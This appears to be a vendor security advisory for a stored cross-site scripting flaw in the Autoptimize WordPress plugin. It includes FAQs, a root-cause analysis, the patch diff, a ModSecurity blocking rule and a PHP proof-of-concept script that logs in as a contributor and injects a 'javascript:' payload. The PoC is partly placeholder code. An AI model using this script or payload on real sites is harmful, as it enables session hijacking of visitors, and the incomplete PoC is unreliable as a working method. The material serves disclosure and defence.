What is CVE-2026-2352?

CVE-2026-2352 is a stored cross-site scripting (XSS) vulnerability in the Autoptimize plugin for WordPress, affecting versions up to and including 3.1.14. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘ao_post_preload’ meta value.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the Autoptimize plugin. When an attacker submits a crafted payload through the post editor, the unsanitized value is stored and later rendered in the HTML, allowing the injected script to execute in the context of any user accessing the affected page.

Who is affected by this vulnerability?

Any WordPress site using the Autoptimize plugin version 3.1.14 or earlier is at risk. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability to inject malicious scripts.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Autoptimize plugin installed. If it is version 3.1.14 or earlier, your site is at risk. Additionally, review user roles to see if any Contributor-level users exist who could potentially exploit this vulnerability.

What steps should I take to mitigate this issue?

To mitigate this vulnerability, update the Autoptimize plugin to version 3.1.15 or later, where the issue has been patched. Regularly check for updates and ensure that all plugins are kept up to date to minimize security risks.

What does the CVSS score of 6.4 indicate?

The CVSS score of 6.4 indicates a medium severity level, suggesting that while exploitation requires authenticated access, it can lead to significant consequences such as session hijacking or account takeover if successfully executed.

What are the practical risks of this vulnerability?

The practical risks include the potential for attackers to execute arbitrary JavaScript in the context of users visiting the compromised page. This can lead to data theft, session hijacking, or defacement of the site, affecting user trust and site integrity.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated user can exploit the vulnerability by submitting a crafted payload through the WordPress admin interface. It shows the steps to log in, inject the payload, and how the malicious script executes when a user visits the affected page.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Autoptimize plugin until you can apply the patch. Additionally, review user roles and permissions to limit access for Contributor-level users until the vulnerability is addressed.

Are there any additional security measures I should implement?

In addition to updating the plugin, consider implementing security measures such as web application firewalls (WAFs), regular security audits, and user role management to minimize the risk of exploitation from authenticated users.

Where can I find more information about this vulnerability?

More information about CVE-2026-2352 can be found on the official CVE database, security advisory pages, and the Autoptimize plugin changelog. Staying informed through security blogs and forums can also provide updates on vulnerabilities and best practices.

What is stored cross-site scripting (XSS)?

Stored cross-site scripting (XSS) is a type of security vulnerability where an attacker can inject malicious scripts into content that is stored on a server. When other users access the affected content, the script executes in their browsers, potentially leading to data theft or other malicious actions.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 30, 2026

CVE-2026-2352: Autoptimize <= 3.1.14 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'ao_post_preload' Meta Value (autoptimize)

CVE ID CVE-2026-2352

Plugin autoptimize

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.1.14

Patched Version 3.1.15

Disclosed March 19, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2352:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Autoptimize WordPress plugin. The vulnerability exists in the handling of the ‘ao_post_preload’ meta value, allowing Contributor-level or higher authenticated users to inject arbitrary JavaScript. The injected script executes when a user visits a page containing the malicious payload, provided the plugin’s image optimization or lazy-load features are active. The CVSS score of 6.4 reflects the requirement for contributor-level access and specific plugin configuration.

Atomic Edge research identifies the root cause as a dual failure in the plugin’s security controls. The `ao_metabox_save()` function in `autoptimize/classes/autoptimizeMetabox.php` (line 276) lacked input sanitization for the `ao_post_preload` parameter, directly assigning the unsanitized `$_POST[ $opti_type ]` value. This tainted data was then stored as post meta. The second failure occurred in the output rendering functions within `autoptimize/classes/autoptimizeImages.php`. The `imgopt_preload_tag()` method (lines 801 and 935) and the `build_preloads()` method (line 1053) directly concatenated the unsanitized meta value into HTML “ tags without proper output escaping.

The exploitation method requires an authenticated attacker with at least Contributor privileges. The attacker submits a crafted POST request to the WordPress post editor or a similar endpoint that triggers the `ao_metabox_save()` function. The payload is placed in the `ao_post_preload` parameter. A sample payload could be `javascript:alert(document.domain)//https://example.com/image.jpg`. When the vulnerable plugin configuration is active, the `autoptimizeImages.php` file renders this value directly into the `href` attribute of a “ tag in the page’s HTML header. This results in script execution in the victim’s browser when the page loads.

The patch addresses the vulnerability at both the input and output layers. In `autoptimizeMetabox.php` line 276, the patch adds `sanitize_text_field()` to sanitize the `ao_post_preload` value before storage. In `autoptimizeImages.php`, the patch introduces a new `kses_preload_link()` method. This method is called via `apply_filters()` on lines 801, 935, and 1058. The `kses_preload_link()` function uses WordPress’s `wp_kses()` function with a strictly defined allowlist of HTML attributes (`rel`, `href`, `as`, `imagesizes`, `imagesrcset`, `type`, `media`, `fetchpriority`). This strips any unauthorized attributes or malicious content from the final HTML output, neutralizing the XSS payload.

The impact of successful exploitation is stored cross-site scripting. An attacker can inject malicious JavaScript that executes in the context of any user viewing the compromised page. This can lead to session hijacking, account takeover, defacement, or redirection to malicious sites. The attacker can also perform actions on behalf of the victim user, potentially escalating privileges if the victim has higher-level access. The stored nature of the attack means a single injection can affect multiple users over time.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/autoptimize/autoptimize.php
+++ b/autoptimize/autoptimize.php
@@ -3,7 +3,7 @@
  * Plugin Name: Autoptimize
  * Plugin URI: https://autoptimize.com/pro/
  * Description: Makes your site faster by optimizing CSS, JS, Images, Google fonts and more.
- * Version: 3.1.14
+ * Version: 3.1.15
  * Author: Frank Goossens (futtta)
  * Author URI: https://autoptimize.com/pro/
  * Text Domain: autoptimize
@@ -21,7 +21,7 @@
     exit;
 }

-define( 'AUTOPTIMIZE_PLUGIN_VERSION', '3.1.14' );
+define( 'AUTOPTIMIZE_PLUGIN_VERSION', '3.1.15' );

 // plugin_dir_path() returns the trailing slash!
 define( 'AUTOPTIMIZE_PLUGIN_DIR', plugin_dir_path( __FILE__ ) );
--- a/autoptimize/classes/autoptimizeExtra.php
+++ b/autoptimize/classes/autoptimizeExtra.php
@@ -467,7 +467,7 @@
                 $preload_as = 'other';
             }

-            $preload_output .= '<link rel="preload" href="' . $preload . '" as="' . $preload_as . '"' . $mime_type . $crossorigin . '>';
+            $preload_output .= '<link rel="preload" fetchpriority="high" href="' . $preload . '" as="' . $preload_as . '"' . $mime_type . $crossorigin . '>';
         }
         $preload_output = apply_filters( 'autoptimize_filter_extra_preload_output', $preload_output );

--- a/autoptimize/classes/autoptimizeImages.php
+++ b/autoptimize/classes/autoptimizeImages.php
@@ -801,7 +801,7 @@
         if ( ! empty( $metabox_preloads ) && is_array( $metabox_preloads ) && empty( $to_preload ) && false !== apply_filters( 'autoptimize_filter_imgopt_dopreloads', true ) ) {
             // the preload was not in an img tag, so adding a non-responsive preload instead.
             foreach ( $metabox_preloads as $img_preload ) {
-                $to_preload .= '<link rel="preload" href="' . $img_preload . '" as="image">';
+                $to_preload .= apply_filters( 'autoptimize_filter_imgopt_preload_tag_result', $this->kses_preload_link( '<link fetchpriority="high" rel="preload" href="' . $img_preload . '" as="image">' ) );
             }
         }

@@ -935,7 +935,7 @@
         if ( ! empty( $metabox_preloads ) && is_array( $metabox_preloads ) && empty( $to_preload ) && false !== apply_filters( 'autoptimize_filter_imgopt_dopreloads', true ) ) {
             // the preload was not in an img tag, so adding a non-responsive preload instead.
             foreach ( $metabox_preloads as $img_preload ) {
-                $to_preload .= '<link rel="preload" href="' . $img_preload . '" as="image">';
+                $to_preload .= apply_filters( 'autoptimize_filter_imgopt_preload_tag_result', $this->kses_preload_link( '<link fetchpriority="high" rel="preload" href="' . $img_preload . '" as="image">' ) );
             }
         }

@@ -984,8 +984,9 @@
                 $placeholder = apply_filters( 'autoptimize_filter_imgopt_lazyload_placeholder', $this->get_default_lazyload_placeholder( $width, $height ) );
             }

-            $tag = preg_replace( '/(s)src=/', ' src='' . $placeholder . '' data-src=', $tag );
-            $tag = preg_replace( '/(s)srcset=/', ' data-srcset=', $tag );
+            $tag = str_replace( ' src=', ' data-src=', $tag );
+            $tag = str_replace( ' srcset=', ' data-srcset=', $tag );
+            $tag = str_replace( '<img ', '<img src='' . $placeholder . '' ', $tag );

             // move sizes to data-sizes unless filter says no.
             if ( apply_filters( 'autoptimize_filter_imgopt_lazyload_move_sizes', true ) ) {
@@ -1053,11 +1054,21 @@

         // rewrite img tag to link preload img.
         $_from = array( '<img ', ' src=', ' sizes=', ' srcset=' );
-        $_to   = array( '<link rel="preload" as="image" ', ' href=', ' imagesizes=', ' imagesrcset=' );
+        $_to   = array( '<link fetchpriority="high" rel="preload" as="image" ', ' href=', ' imagesizes=', ' imagesrcset=' );
         $tag   = str_replace( $_from, $_to, $tag );

-        // and using kses, remove all unneeded attributes
-        // keeping only those we *know* are OK and/ or needed
+        // sanitize output
+        $tag = $this->kses_preload_link( $tag );
+
+        // and provide filter for late changes.
+        $tag = apply_filters( 'autoptimize_filter_imgopt_preload_tag_result', $tag );
+
+        return $tag;
+    }
+
+    public static function kses_preload_link( $_preload ) {
+        // using kses, remove all unneeded attributes
+        // keeping only those we *know* are OK and/ or needed.
         $allowed_html = array(
                 'link' => array(
                     'rel'           => true,
@@ -1067,11 +1078,12 @@
                     'imagesrcset'   => true,
                     'type'          => true,
                     'media'         => true,
+                    'fetchpriority' => true,
                 ),
             );
-        $tag = wp_kses( $tag, $allowed_html );
+        $_preload = wp_kses( $_preload, $allowed_html );

-        return $tag;
+        return $_preload;
     }

     public static function get_cdn_url() {
--- a/autoptimize/classes/autoptimizeMetabox.php
+++ b/autoptimize/classes/autoptimizeMetabox.php
@@ -273,7 +273,7 @@
         foreach ( apply_filters( 'autoptimize_filter_meta_valid_optims', array( 'ao_post_optimize', 'ao_post_js_optimize', 'ao_post_css_optimize', 'ao_post_ccss', 'ao_post_lazyload', 'ao_post_preload' ) ) as $opti_type ) {
             if ( in_array( $opti_type, apply_filters( 'autoptimize_filter_meta_optim_nonbool', array( 'ao_post_preload' ) ) ) ) {
                 if ( isset( $_POST[ $opti_type ] ) ) {
-                    $ao_meta_result[ $opti_type ] = $_POST[ $opti_type ];
+                    $ao_meta_result[ $opti_type ] = sanitize_text_field( $_POST[ $opti_type ] );
                 } else {
                     $ao_meta_result[ $opti_type ] = false;
                 }
--- a/autoptimize/classes/external/php/ao-minify-html.php
+++ b/autoptimize/classes/external/php/ao-minify-html.php
@@ -98,7 +98,7 @@
             $this->_isXhtml = (false !== strpos($this->_html, '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML'));
         }

-        $this->_replacementHash = 'MINIFYHTML' . md5($_SERVER['REQUEST_TIME']);
+        $this->_replacementHash = 'MINIFYHTML' . bin2hex( random_bytes( 16 ) );
         $this->_placeholders = array();

         // replace SCRIPTs (and minify) with placeholders

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2352
SecRule REQUEST_URI "@streq /wp-admin/post.php" 
  "id:10002352,phase:2,deny,status:403,chain,msg:'CVE-2026-2352: Autoptimize Stored XSS via ao_post_preload',severity:'CRITICAL',tag:'CVE-2026-2352',tag:'WordPress',tag:'Plugin/Autoptimize',tag:'Attack/XSS'"
  SecRule ARGS_POST:action "@streq editpost" "chain"
    SecRule ARGS_POST:ao_post_preload "@rx javascript:" 
      "t:lowercase,t:urlDecodeUni,t:htmlEntityDecode,ctl:auditLogParts=+E"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2352 - Autoptimize <= 3.1.14 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'ao_post_preload' Meta Value

<?php

$target_url = 'http://vulnerable-wordpress-site.local/wp-admin/post.php';
$username = 'contributor_user';
$password = 'contributor_pass';
$payload = 'javascript:alert(document.domain)//https://example.com/legit.jpg';

// Initialize cURL session for login
$ch = curl_init();

// Step 1: Get login page to retrieve nonce and cookies
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.local/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$login_page = curl_exec($ch);

// Extract the login nonce (wp-login.php uses 'log' and 'pwd' fields, nonce is in _wpnonce)
preg_match('/name="_wpnonce" value="([^"]+)"/', $login_page, $matches);
$login_nonce = $matches[1] ?? '';

// Step 2: Perform login
$login_data = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => 'http://vulnerable-wordpress-site.local/wp-admin/',
    'testcookie' => '1',
    '_wpnonce' => $login_nonce
]);

curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.local/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);

// Step 3: Create a new post to get a post ID and edit nonce
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.local/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$new_post_page = curl_exec($ch);

// Extract post ID and nonce from the page (simplified - in reality, you'd parse the form)
// For this PoC, we assume we have a post ID to edit, like post=123
$post_id = 123; // This should be obtained from a previous post creation step

// Step 4: Exploit - Submit the malicious ao_post_preload meta value
// This would typically be done via the post editor's metabox save mechanism.
// The ao_metabox_save() function is called via WordPress's save_post hook.
// We simulate a POST to update the post with our payload.
$exploit_data = http_build_query([
    'post_ID' => $post_id,
    'action' => 'editpost',
    'ao_post_preload' => $payload, // The unsanitized XSS payload
    '_wpnonce' => 'EDIT_POST_NONCE', // Nonce would need to be extracted
    '_wp_http_referer' => '/wp-admin/post.php?post=' . $post_id . '&action=edit',
    // Other required post fields would be here
]);

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);
$exploit_response = curl_exec($ch);

// Check response
if (strpos($exploit_response, 'Post updated') !== false) {
    echo "[+] Payload injected successfully.n";
    echo "[+] Visit the post at: http://vulnerable-wordpress-site.local/?p=" . $post_id . "n";
    echo "[+] The XSS will execute if 'Image optimization' or 'Lazy-load images' is enabled in Autoptimize settings.n";
} else {
    echo "[-] Injection may have failed. Check authentication and nonce.n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-2352?
Overview of the vulnerability
CVE-2026-2352 is a stored cross-site scripting (XSS) vulnerability in the Autoptimize plugin for WordPress, affecting versions up to and including 3.1.14. It allows authenticated users with Contributor-level access or higher to inject malicious scripts via the ‘ao_post_preload’ meta value.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping in the Autoptimize plugin. When an attacker submits a crafted payload through the post editor, the unsanitized value is stored and later rendered in the HTML, allowing the injected script to execute in the context of any user accessing the affected page.
Who is affected by this vulnerability?
Identifying affected users
Any WordPress site using the Autoptimize plugin version 3.1.14 or earlier is at risk. Specifically, authenticated users with Contributor-level access or higher can exploit this vulnerability to inject malicious scripts.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To check if your site is vulnerable, verify the version of the Autoptimize plugin installed. If it is version 3.1.14 or earlier, your site is at risk. Additionally, review user roles to see if any Contributor-level users exist who could potentially exploit this vulnerability.
What steps should I take to mitigate this issue?
Fixing the vulnerability
To mitigate this vulnerability, update the Autoptimize plugin to version 3.1.15 or later, where the issue has been patched. Regularly check for updates and ensure that all plugins are kept up to date to minimize security risks.
What does the CVSS score of 6.4 indicate?
Understanding the severity rating
The CVSS score of 6.4 indicates a medium severity level, suggesting that while exploitation requires authenticated access, it can lead to significant consequences such as session hijacking or account takeover if successfully executed.
What are the practical risks of this vulnerability?
Potential impacts on users
The practical risks include the potential for attackers to execute arbitrary JavaScript in the context of users visiting the compromised page. This can lead to data theft, session hijacking, or defacement of the site, affecting user trust and site integrity.
How does the proof of concept demonstrate the vulnerability?
Understanding the exploitation method
The proof of concept illustrates how an authenticated user can exploit the vulnerability by submitting a crafted payload through the WordPress admin interface. It shows the steps to log in, inject the payload, and how the malicious script executes when a user visits the affected page.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updating is not possible, consider disabling the Autoptimize plugin until you can apply the patch. Additionally, review user roles and permissions to limit access for Contributor-level users until the vulnerability is addressed.
Are there any additional security measures I should implement?
Enhancing overall security
In addition to updating the plugin, consider implementing security measures such as web application firewalls (WAFs), regular security audits, and user role management to minimize the risk of exploitation from authenticated users.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-2352 can be found on the official CVE database, security advisory pages, and the Autoptimize plugin changelog. Staying informed through security blogs and forums can also provide updates on vulnerabilities and best practices.
What is stored cross-site scripting (XSS)?
Defining the attack type
Stored cross-site scripting (XSS) is a type of security vulnerability where an attacker can inject malicious scripts into content that is stored on a server. When other users access the affected content, the script executes in their browsers, potentially leading to data theft or other malicious actions.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations